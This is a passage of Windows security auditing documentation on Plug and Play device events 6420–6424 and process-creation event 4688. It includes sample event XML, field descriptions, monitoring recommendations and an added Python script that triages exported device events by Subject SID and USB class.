<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>6420</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13316</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-14T22:23:29.137398300Z" />
    <EventRecordID>484</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="88" />
    <Channel>Security</Channel>
    <Computer>DESKTOP-NFC0HVN</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="DeviceId">USB\VID_138A&PID_0017\ffbc12c950a0</Data>
    <Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
    <Data Name="ClassId">{53D29EF7-377C-4D14-864B-EB3A85769359}</Data>
    <Data Name="ClassName">Biometric</Data>
    <Data Name="HardwareIds">USB\VID_138A&PID_0017&REV_0078 USB\VID_138A&PID_0017</Data>
    <Data Name="CompatibleIds">USB\Class_FF&SubClass_00&Prot_00 USB\Class_FF&SubClass_00 USB\Class_FF</Data>
    <Data Name="LocationInformation">Port_#0002.Hub_#0004</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that disabled the device. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that disabled the device.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString]: “Device instance path” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Device Name [Type = UnicodeString]: “Device description” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class Name [Type = UnicodeString]: “Class” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Location Information [Type = UnicodeString]: “Location information” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.

Security Monitoring Recommendations


For 6420(S): A device was disabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

You can use this event to track the events and event information shown in the following table by using the listed
fields:

EVENT AND EVENT INFORMATION TO MONITOR | FIELD TO USE
Device disable events, Device Instance Path | “Device ID”
Device disable events, Device Description | “Device Name”
Device disable events, Class GUID | “Class ID”
Device disable events, Hardware IDs | “Hardware IDs”
Device disable events, Compatible IDs | “Compatible IDs”
Device disable events, Location information | “Location Information”


6421(S): A request was made to enable a device.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time someone makes a request to enable a device.
This event doesn’t mean that the device was enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>6421</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13316</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-14T22:37:50.034918700Z" />
    <EventRecordID>485</EventRecordID>
    <Correlation />
    <Execution ProcessID="2192" ThreadID="1392" />
    <Channel>Security</Channel>
    <Computer>DESKTOP-NFC0HVN</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-2695983153-1310895815-1903476278-1001</Data>
    <Data Name="SubjectUserName">ladmin</Data>
    <Data Name="SubjectDomainName">DESKTOP-NFC0HVN</Data>
    <Data Name="SubjectLogonId">0x3fcc7</Data>
    <Data Name="DeviceId">USB\VID_138A&PID_0017\FFBC12C950A0</Data>
    <Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
    <Data Name="ClassId">{53D29EF7-377C-4D14-864B-EB3A85769359}</Data>
    <Data Name="ClassName">Biometric</Data>
    <Data Name="HardwareIds">USB\VID_138A&PID_0017&REV_0078 USB\VID_138A&PID_0017</Data>
    <Data Name="CompatibleIds">USB\Class_FF&SubClass_00&Prot_00 USB\Class_FF&SubClass_00 USB\Class_FF</Data>
    <Data Name="LocationInformation">Port_#0002.Hub_#0004</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made the request. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made the request.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString]: “Device instance path” attribute of device.
Device Name [Type = UnicodeString]: “Device description” attribute of device.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device.
Class Name [Type = UnicodeString]: “Class” attribute of device.
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device.
Location Information [Type = UnicodeString]: “Location information” attribute of device.
To see any of these device attributes, start Device Manager, open the properties of the specific device, and click
“Details”.

Security Monitoring Recommendations

For 6421(S): A request was made to enable a device.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

You can use this event to track the events and event information shown in the following table by using the listed
fields:

EVENT AND EVENT INFORMATION TO MONITOR FIELD TO USE

Device enable requests, Device Instance Path “Device ID”

Device enable requests, Device Description “Device Name”

Device enable requests, Class GUID “Class ID”

Device enable requests, Hardware IDs “Hardware IDs”

Device enable requests, Compatible IDs “Compatible IDs”

Device enable requests, Location information “Location Information”


6422(S): A device was enabled.
4/5/2019 • 3 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time a specific device is enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>6422</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-14T22:37:50.036050900Z" />
<EventRecordID>486</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="408" />
<Channel>Security</Channel>
<Computer>DESKTOP-NFC0HVN</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="DeviceId">USB\VID_138A&PID_0017\ffbc12c950a0</Data>
<Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
<Data Name="ClassId">{53D29EF7-377C-4D14-864B-EB3A85769359}</Data>
<Data Name="ClassName">Biometric</Data>
<Data Name="HardwareIds">USB\VID_138A&PID_0017&REV_0078 USB\VID_138A&PID_0017</Data>
<Data Name="CompatibleIds">USB\Class_FF&SubClass_00&Prot_00 USB\Class_FF&SubClass_00 USB\Class_FF</Data>
<Data Name="LocationInformation">Port_#0002.Hub_#0004</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that enabled the device. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that enabled the device.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString]: “Device instance path” attribute of device.
Device Name [Type = UnicodeString]: “Device description” attribute of device.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device.
Class Name [Type = UnicodeString]: “Class” attribute of device.
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device.
Location Information [Type = UnicodeString]: “Location information” attribute of device.
To see any of these device attributes, start Device Manager, open the properties of the specific device, and click
“Details”.

Security Monitoring Recommendations

For 6422(S): A device was enabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
You can use this event to track the events and event information shown in the following table by using the
listed fields:

EVENT AND EVENT INFORMATION TO MONITOR                 FIELD TO USE

Device enable events, Device Instance Path             “Device ID”
Device enable events, Device Description               “Device Name”
Device enable events, Class GUID                       “Class ID”
Device enable events, Hardware IDs                     “Hardware IDs”
Device enable events, Compatible IDs                   “Compatible IDs”
Device enable events, Location information             “Location Information”


6423(S): The installation of this device is forbidden by system policy.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time installation of a device is forbidden by system policy.
Device installation restriction group policies are located under Computer Configuration\Administrative
Templates\System\Device Installation\Device Installation Restrictions. If one of these policies restricts
installation of a specific device, this event is generated.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>6423</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-14T22:49:34.647975900Z" />
<EventRecordID>488</EventRecordID>
<Correlation />
<Execution ProcessID="828" ThreadID="1924" />
<Channel>Security</Channel>
<Computer>DESKTOP-NFC0HVN</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="DeviceId">USB\VID_04F3&PID_012D\7&1E3A8971&0&2</Data>
<Data Name="DeviceDescription">Touchscreen</Data>
<Data Name="ClassId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="ClassName" />
<Data Name="HardwareIds">USB\VID_04F3&PID_012D&REV_0013 USB\VID_04F3&PID_012D</Data>
<Data Name="CompatibleIds">USB\Class_03&SubClass_00&Prot_00 USB\Class_03&SubClass_00 USB\Class_03</Data>
<Data Name="LocationInformation">Port_#0002.Hub_#0004</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that forbids the device installation. Event Viewer automatically tries
to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that forbids the device installation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString]: “Device instance path” attribute of device.
Device Name [Type = UnicodeString]: “Device description” attribute of device.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device.
Class Name [Type = UnicodeString]: “Class” attribute of device.
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device.
Location Information [Type = UnicodeString]: “Location information” attribute of device.
To see any of these device attributes, start Device Manager, open the properties of the specific device, and click
“Details”.

Security Monitoring Recommendations

For 6423(S): The installation of this device is forbidden by system policy.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you want to track device installation policy violations, then you need to track every event of this type.
Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
You can use this event to track the policy violations and related information shown in the following table by
using the listed fields:

POLICY VIOLATION AND RELATED INFORMATION TO MONITOR              FIELD TO USE

Device installation policy violations, Device Instance Path      “Device ID”
Device installation policy violations, Device Description        “Device Name”
Device installation policy violations, Class GUID                “Class ID”
Device installation policy violations, Hardware IDs              “Hardware IDs”
Device installation policy violations, Compatible IDs            “Compatible IDs”
Device installation policy violations, Location information      “Location Information”

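The following is an added example, not part of the Microsoft documentation, that applies the 6422 and 6423 recommendations above to event records exported as XML (for example with wevtutil qe Security /f:xml, or Get-WinEvent and ToXml()): every 6423 is reported as a policy violation, and 6421/6422 are reported only when the Subject SID is not SYSTEM (S-1-5-18). It also pulls the VID/PID out of Hardware IDs and the USB base class out of Compatible IDs, so a triage queue shows what kind of device was involved. The first two sample records are cut down from the 6422 and 6423 samples on this page; the third (a non-SYSTEM 6422 for a mass-storage device with VID_1234/PID_5678) is constructed for the example. The USB class-code names (0x03 HID, 0x08 mass storage, 0xFF vendor-specific) come from the USB-IF class code list, not from this page.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SYSTEM_SID = "S-1-5-18"   # the Subject that normally raises 6421/6422

# USB base class codes from the USB-IF class code list (assumption: not stated on this page).
USB_CLASS = {"03": "HID", "08": "Mass storage", "E0": "Wireless controller", "FF": "Vendor-specific"}
HWID_RE = re.compile(r"VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})")
CLASS_RE = re.compile(r"USB\\Class_([0-9A-Fa-f]{2})")


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) for one Security-log event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "").strip() for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def describe_device(data):
    """VID/PID from Hardware IDs and the USB base class from Compatible IDs."""
    m = HWID_RE.search(data.get("HardwareIds", ""))
    vid, pid = (m.group(1).upper(), m.group(2).upper()) if m else (None, None)
    classes = sorted({c.upper() for c in CLASS_RE.findall(data.get("CompatibleIds", ""))})
    return {"vid": vid, "pid": pid,
            "usb_class": ", ".join(USB_CLASS.get(c, "Class_" + c) for c in classes) or "unknown",
            "device_id": data.get("DeviceId", ""), "description": data.get("DeviceDescription", ""),
            "location": data.get("LocationInformation", "")}


def triage_pnp_event(xml_text):
    """Report every 6423, and 6421/6422 whose Subject\\Security ID is not SYSTEM; otherwise None."""
    event_id, data = parse_event(xml_text)
    subject_sid = data.get("SubjectUserSid", "")
    if event_id == 6423:
        reason = "device installation forbidden by policy"
    elif event_id in (6421, 6422) and subject_sid != SYSTEM_SID:
        reason = "device %s by non-SYSTEM subject" % ("enable requested" if event_id == 6421 else "enabled")
    else:
        return None
    finding = describe_device(data)
    finding.update(event_id=event_id, subject_sid=subject_sid, reason=reason,
                   subject="%s\\%s" % (data.get("SubjectDomainName", ""), data.get("SubjectUserName", "")))
    return finding


def triage_all(events):
    return [f for f in map(triage_pnp_event, events) if f]


# Constructed sample records (the first two cut down from this page's 6422/6423 samples).
SAMPLE_EVENTS = [
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>6422</EventID><Computer>DESKTOP-NFC0HVN</Computer></System><EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data><Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="DeviceId">USB\VID_138A&amp;PID_0017\ffbc12c950a0</Data>
<Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
<Data Name="ClassName">Biometric</Data>
<Data Name="HardwareIds">USB\VID_138A&amp;PID_0017&amp;REV_0078 USB\VID_138A&amp;PID_0017</Data>
<Data Name="CompatibleIds">USB\Class_FF&amp;SubClass_00&amp;Prot_00 USB\Class_FF</Data>
<Data Name="LocationInformation">Port_#0002.Hub_#0004</Data></EventData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>6423</EventID><Computer>DESKTOP-NFC0HVN</Computer></System><EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data><Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="DeviceId">USB\VID_04F3&amp;PID_012D\7&amp;1E3A8971&amp;0&amp;2</Data>
<Data Name="DeviceDescription">Touchscreen</Data><Data Name="ClassName" />
<Data Name="HardwareIds">USB\VID_04F3&amp;PID_012D&amp;REV_0013 USB\VID_04F3&amp;PID_012D</Data>
<Data Name="CompatibleIds">USB\Class_03&amp;SubClass_00&amp;Prot_00 USB\Class_03</Data>
<Data Name="LocationInformation">Port_#0002.Hub_#0004</Data></EventData></Event>""",
    # Constructed: an interactive user (SID from this page's 4688 sample) enabling a USB disk.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>6422</EventID><Computer>DESKTOP-NFC0HVN</Computer></System><EventData>
<Data Name="SubjectUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="SubjectUserName">dadmin</Data><Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="DeviceId">USB\VID_1234&amp;PID_5678\0123456789</Data>
<Data Name="DeviceDescription">USB Mass Storage Device</Data><Data Name="ClassName">USB</Data>
<Data Name="HardwareIds">USB\VID_1234&amp;PID_5678&amp;REV_0100 USB\VID_1234&amp;PID_5678</Data>
<Data Name="CompatibleIds">USB\Class_08&amp;SubClass_06&amp;Prot_50 USB\Class_08</Data>
<Data Name="LocationInformation">Port_#0001.Hub_#0003</Data></EventData></Event>""",
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_EVENTS):
        print(finding)
```

Running the block prints two findings: the 6423 touchscreen (HID, VID 04F3/PID 012D) and the user-initiated 6422 for the mass-storage device; the SYSTEM-initiated fingerprint-sensor 6422 is suppressed, as the recommendation above intends. Exported records are XML, so `&` appears as `&amp;` in the samples even though this page prints the raw values.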

6424(S): The installation of this device was allowed, after having previously been forbidden by policy.

Applies to
Windows 10
Windows Server 2016
This event occurs rarely, and in some situations may be difficult to reproduce.
Subcategory: Audit PNP Activity
Required Server Roles: None.
Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.

Security Monitoring Recommendations

There is no recommendation for this event in this document.
Audit Process Creation

Applies to
Windows 10
Windows Server 2016
Audit Process Creation determines whether the operating system generates audit events when a process is
created (starts).
These audit events can help you track user activity and understand how a computer is being used. Information
includes the name of the program or the user that created the process.
Event volume: Low to Medium, depending on system usage.
This subcategory allows you to audit events generated when a process is created or starts. The name of the
application and user that created the process is also audited.

COMPUTER TYPE        GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller    Yes               No                Yes                No
Member Server        Yes               No                Yes                No
Workstation          Yes               No                Yes                No

Comments (the same for all computer types): It is typically useful to collect Success auditing information for
this subcategory for forensic investigations, to find out who ran a specific process, when, and with which
options\parameters. Additionally, you can analyse process creation events for elevated credentials use,
potential malicious process names and so on. The event volume is typically medium-high, depending on the
process activity on the computer. This subcategory doesn’t have Failure events, so there is no recommendation
to enable Failure auditing for this subcategory.

Events List:
4688(S): A new process has been created.
4696(S): A primary token was assigned to process.
4688(S): A new process has been created.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Creation
Event Description:
This event generates every time a new process starts.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4688</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-12T02:24:52.377352500Z" />
<EventRecordID>2814</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="400" />
<Channel>Security</Channel>
<Computer>WIN-GG82ULGC9GO.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="NewProcessId">0x2bc</Data>
<Data Name="NewProcessName">C:\\Windows\\System32\\rundll32.exe</Data>
<Data Name="TokenElevationType">%%1938</Data>
<Data Name="ProcessId">0xe74</Data>
<Data Name="CommandLine" />
<Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x4a5af0</Data>
<Data Name="ParentProcessName">C:\\Windows\\explorer.exe</Data>
<Data Name="MandatoryLabel">S-1-16-8192</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012 R2, Windows 8.1.
Added “Process Command Line” field.
2 - Windows 10.
Subject renamed to Creator Subject.
Added “Target Subject” section.
Added “Mandatory Label” field.
Added “Creator Process Name” field.
Field Descriptions:
Creator Subject [Value for versions 0 and 1 – Subject]:
Security ID [Type = SID]: SID of account that requested the “create process” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.
Note A security identifier (SID) is a unique value of variable length used to identify a trustee
(security principal). Each account has a unique SID that is issued by an authority, such as an Active
Directory domain controller, and stored in a security database. Each time a user logs on, the system
retrieves the SID for that user from the database and places it in the access token for that user. The
system uses the SID in the access token to identify the user in all subsequent interactions with
Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever
be used again to identify another user or group. For more information about SIDs, see Security
identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create
process” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS
LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this
account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent
events that might contain the same Logon ID, for example, “4624: An account was successfully
logged on.”
Target Subject [Version 2]:

Note This event includes the principal of the process creator, but this is not always sufficient if the
target context is different from the creator context. In that situation, the subject specified in the process
termination event does not match the subject in the process creation event even though both events
refer to the same process ID. Therefore, in addition to including the creator of the process, we will also
include the target principal when the creator and target do not share the same logon.

Security ID [Type = SID] [Version 2]: SID of target account. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee
(security principal). Each account has a unique SID that is issued by an authority, such as an Active
Directory domain controller, and stored in a security database. Each time a user logs on, the system
retrieves the SID for that user from the database and places it in the access token for that user. The
system uses the SID in the access token to identify the user in all subsequent interactions with
Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever
be used again to identify another user or group. For more information about SIDs, see Security
identifiers.

Account Name [Type = UnicodeString] [Version 2]: the name of the target account.
Account Domain [Type = UnicodeString] [Version 2]: target account’s domain or computer name.
Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS
LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this
account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64] [Version 2]: hexadecimal value that can help you correlate this event
with recent events that might contain the same Logon ID, for example, “4624: An account was
successfully logged on.”
Process Information:
New Process ID [Type = Pointer]: hexadecimal Process ID of the new process. Process ID (PID) is a
number used by the operating system to uniquely identify an active process. To see the PID for a
specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the
hexadecimal value to decimal, you can compare it to the values in Task Manager.

New Process Name [Type = UnicodeString]: full path and the name of the executable for the new
process.
Token Elevation Type [Type = UnicodeString]:
TokenElevationTypeDefault (1): Type 1 is a full token with no privileges removed or
groups disabled. A full token is only used if User Account Control is disabled or if the user is
the built-in Administrator account (for which UAC is disabled by default), a service account or
the local system account.
TokenElevationTypeFull (2): Type 2 is an elevated token with no privileges removed or
groups disabled. An elevated token is used when User Account Control is enabled and the
user chooses to start the program using Run as administrator. An elevated token is also used
when an application is configured to always require administrative privilege or to always
require maximum privilege, and the user is a member of the Administrators group.
TokenElevationTypeLimited (3): Type 3 is a limited token with administrative privileges
removed and administrative groups disabled. The limited token is used when User Account
Control is enabled, the application does not require administrative privilege, and the user does
not choose to start the program using Run as administrator.
Mandatory Label [Version 2] [Type = SID]: SID of the integrity label that was assigned to the new
process. Can have one of the following values:

SID              RID           RID LABEL                                  MEANING
S-1-16-0         0x00000000    SECURITY_MANDATORY_UNTRUSTED_RID           Untrusted.
S-1-16-4096      0x00001000    SECURITY_MANDATORY_LOW_RID                 Low integrity.
S-1-16-8192      0x00002000    SECURITY_MANDATORY_MEDIUM_RID              Medium integrity.
S-1-16-8448      0x00002100    SECURITY_MANDATORY_MEDIUM_PLUS_RID         Medium high integrity.
S-1-16-12288     0x00003000    SECURITY_MANDATORY_HIGH_RID                High integrity.
S-1-16-16384     0x00004000    SECURITY_MANDATORY_SYSTEM_RID              System integrity.
S-1-16-20480     0x00005000    SECURITY_MANDATORY_PROTECTED_PROCESS_RID   Protected process.

Creator Process ID [Type = Pointer]: hexadecimal Process ID of the process which ran the new process.
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.

You can also correlate this process ID with a process ID in other events, for example, “4688: A new
